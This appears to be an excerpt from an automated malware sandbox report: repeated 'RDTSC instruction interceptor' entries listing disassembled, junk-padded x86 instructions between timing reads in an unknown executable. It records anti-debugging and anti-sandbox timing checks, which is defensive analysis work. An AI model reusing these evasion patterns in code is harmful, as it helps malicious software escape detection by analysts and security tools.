Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 121B1B8 second address: 121B1BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1228B47 second address: 1228B4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1228B4D second address: 1228B57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007EFFE92369C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1228B57 second address: 1228B74 instructions: 0x00000000 rdtsc 0x00000002 jne 00007EFFE8794FA6h 0x00000008 jmp 00007EFFE8794FADh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1239C5C second address: 1239C60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1239C60 second address: 1239C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007EFFE8794FA6h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1239C71 second address: 1239C9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push edx 0x00000007 jnc 00007EFFE92369C8h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007EFFE92369D9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 123AA99 second address: 123AABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFFE8794FB8h 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 123AABA second address: 123AADE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE92369D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007EFFE92369C6h 0x00000012 jp 00007EFFE92369C6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 123AADE second address: 123AAE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 124FEB0 second address: 124FEB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 124FEB4 second address: 124FEBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 124FEBF second address: 124FECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007EFFE92369CCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 124FD4F second address: 124FD59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007EFFE8794FA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 124FD59 second address: 124FD5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 125B838 second address: 125B83D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 12607C0 second address: 12607C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 12607C4 second address: 12607CD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 12607CD second address: 12607DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007EFFE92369C6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 126032F second address: 126033D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007EFFE8794FA6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 126033D second address: 126034A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007EFFE92369C6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1278DF6 second address: 1278DFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1278DFC second address: 1278E00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 115B439 second address: 115B43F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1277C6B second address: 1277C90 instructions: 0x00000000 rdtsc 0x00000002 jne 00007EFFE92369CEh 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007EFFE92369D1h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1277C90 second address: 1277C94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1277E29 second address: 1277E41 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007EFFE92369D2h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1278278 second address: 1278289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 js 00007EFFE8794FA6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1278289 second address: 127828D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 127854C second address: 1278565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFFE8794FB5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1278565 second address: 1278569 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1278569 second address: 1278577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007EFFE8794FACh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 127883F second address: 1278843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1278843 second address: 1278847 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1278847 second address: 127884D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1278987 second address: 12789BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE8794FB4h 0x00000007 jmp 00007EFFE8794FB2h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e ja 00007EFFE8794FB2h 0x00000014 pushad 0x00000015 push eax 0x00000016 pop eax 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 127D16E second address: 127D173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1281B2F second address: 1281B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53D0F88 second address: 53D0F8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53D0F8C second address: 53D0F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 5360BE6 second address: 5360BEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 5360BEC second address: 5360BF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 5360BF0 second address: 5360C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007EFFE92369D2h 0x00000010 add ecx, 755F2D38h 0x00000016 jmp 00007EFFE92369CBh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007EFFE92369D8h 0x00000022 or si, A798h 0x00000027 jmp 00007EFFE92369CBh 0x0000002c popfd 0x0000002d popad 0x0000002e mov dword ptr [esp], ebp 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 call 00007EFFE92369CBh 0x00000039 pop ecx 0x0000003a push edx 0x0000003b pop eax 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 5360C5F second address: 5360CA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE8794FB2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c jmp 00007EFFE8794FAEh 0x00000011 movzx esi, bx 0x00000014 popad 0x00000015 push dword ptr [ebp+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007EFFE8794FB8h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 5360CA7 second address: 5360CD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE92369CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c jmp 00007EFFE92369D6h 0x00000011 push dword ptr [ebp+08h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 5360CD8 second address: 5360CDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 5360D15 second address: 5360D52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 45D2B54Ah 0x00000008 pushfd 0x00000009 jmp 00007EFFE92369CBh 0x0000000e adc cx, 57EEh 0x00000013 jmp 00007EFFE92369D9h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 5360D52 second address: 5360D58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A0BC5 second address: 53A0BEA instructions: 0x00000000 rdtsc 0x00000002 mov si, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov bx, 5526h 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007EFFE92369D4h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A0BEA second address: 53A0BEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A0BEE second address: 53A0BF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A0BF4 second address: 53A0C0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 2D90CCE3h 0x00000008 mov edx, eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A0C0A second address: 53A0C0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A0C0E second address: 53A0C14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A0C14 second address: 53A0C56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, si 0x00000006 call 00007EFFE92369D0h 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007EFFE92369CAh 0x0000001a xor eax, 409F6B88h 0x00000020 jmp 00007EFFE92369CBh 0x00000025 popfd 0x00000026 mov esi, 70BCD7FFh 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A0C56 second address: 53A0C79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 mov edi, 0A10ED82h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov ebx, esi 0x00000014 jmp 00007EFFE8794FAEh 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 5390C33 second address: 5390C39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 5390C39 second address: 5390C3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53E0A45 second address: 53E0A49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53E0A49 second address: 53E0A4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53E08B4 second address: 53E08F3 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007EFFE92369D2h 0x00000008 and ch, FFFFFF88h 0x0000000b jmp 00007EFFE92369CBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007EFFE92369D5h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53E08F3 second address: 53E0945 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFFE8794FB7h 0x00000008 mov dh, ah 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 movsx ebx, si 0x00000014 pushfd 0x00000015 jmp 00007EFFE8794FB8h 0x0000001a adc ecx, 14EB85A8h 0x00000020 jmp 00007EFFE8794FABh 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53E0945 second address: 53E095D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFFE92369D4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53E095D second address: 53E0961 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53E0961 second address: 53E09A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007EFFE92369D8h 0x00000011 pushfd 0x00000012 jmp 00007EFFE92369D2h 0x00000017 adc ah, FFFFFF98h 0x0000001a jmp 00007EFFE92369CBh 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53E09A8 second address: 53E09D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFFE8794FAFh 0x00000008 movzx ecx, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007EFFE8794FAEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53E068A second address: 53E06A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ebx, esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007EFFE92369CBh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53E06A2 second address: 53E0749 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE8794FB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007EFFE8794FB1h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007EFFE8794FAEh 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 pushad 0x00000019 mov ax, F933h 0x0000001d mov ebx, ecx 0x0000001f popad 0x00000020 call 00007EFFE8794FB4h 0x00000025 movzx ecx, di 0x00000028 pop ebx 0x00000029 popad 0x0000002a pop ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007EFFE8794FAFh 0x00000034 sbb ax, F2FEh 0x00000039 jmp 00007EFFE8794FB9h 0x0000003e popfd 0x0000003f call 00007EFFE8794FB0h 0x00000044 pop esi 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A0C92 second address: 53A0C96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A0C96 second address: 53A0C9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A0C9A second address: 53A0CA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A0CA0 second address: 53A0CF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE8794FB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007EFFE8794FAEh 0x0000000f push eax 0x00000010 jmp 00007EFFE8794FABh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007EFFE8794FB6h 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A0CF7 second address: 53A0CFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A0CFB second address: 53A0D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53E0DB8 second address: 53E0DEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE92369CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007EFFE92369D6h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007EFFE92369CEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53E0DEF second address: 53E0E6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE8794FABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov esi, 7A77E7FBh 0x00000010 pushad 0x00000011 push edx 0x00000012 pop esi 0x00000013 popad 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 jmp 00007EFFE8794FB5h 0x0000001d mov ecx, 1C55BEB7h 0x00000022 popad 0x00000023 mov eax, dword ptr [ebp+08h] 0x00000026 jmp 00007EFFE8794FAAh 0x0000002b and dword ptr [eax], 00000000h 0x0000002e jmp 00007EFFE8794FB0h 0x00000033 and dword ptr [eax+04h], 00000000h 0x00000037 jmp 00007EFFE8794FB0h 0x0000003c pop ebp 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007EFFE8794FAAh 0x00000046 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53E0E6B second address: 53E0E71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 5390AC5 second address: 5390AD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE8794FAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 5390AD3 second address: 5390B61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007EFFE92369D1h 0x00000009 jmp 00007EFFE92369CBh 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007EFFE92369D8h 0x00000015 or ecx, 23B37DF8h 0x0000001b jmp 00007EFFE92369CBh 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 xchg eax, ebp 0x00000025 pushad 0x00000026 mov edi, ecx 0x00000028 pushad 0x00000029 mov eax, 3360217Dh 0x0000002e pushfd 0x0000002f jmp 00007EFFE92369CAh 0x00000034 sbb si, 5858h 0x00000039 jmp 00007EFFE92369CBh 0x0000003e popfd 0x0000003f popad 0x00000040 popad 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007EFFE92369D4h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 5390B61 second address: 5390B88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE8794FABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007EFFE8794FB5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53E002C second address: 53E0063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 jmp 00007EFFE92369D4h 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 call 00007EFFE92369D7h 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53E0C26 second address: 53E0C2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53E0C2C second address: 53E0C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
